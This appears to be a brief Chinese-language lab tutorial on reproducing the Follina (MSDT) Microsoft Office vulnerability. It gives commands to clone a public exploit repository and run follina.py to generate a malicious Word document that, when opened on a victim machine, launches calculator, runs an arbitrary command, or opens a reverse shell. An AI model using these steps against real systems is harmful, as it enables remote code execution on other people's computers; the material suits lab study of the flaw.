环境准备

  • 攻击机: 带有python的系统,建议kali
  • 靶机:带有office365(不排除后续自动修复),且关闭所有防火墙/杀毒软件
  • 靶机打开word时,需要允许编辑(取消保护)
    2022-06-10T09:38:01.png

流程

下载脚本: https://github.com/JohnHammond/msdt-follina

git clone https://github.com/JohnHammond/msdt-follina
//下载脚本

python3 follina.py
//执行后会在当前目录生成一个follina.doc,将doc放入靶机打开,即可打开计算器

python3 follina.py -c "notepad.exe"
//执行后会在当前目录生成一个follina.doc,将doc放入靶机打开,即可打开记事本

python3 follina.py -r 11451
//执行后会在当前目录生成一个follina.doc,将doc放入靶机打开,即可反弹shell
最后修改:2022 年 06 月 10 日
如果觉得我的文章对你有用,请随意赞赏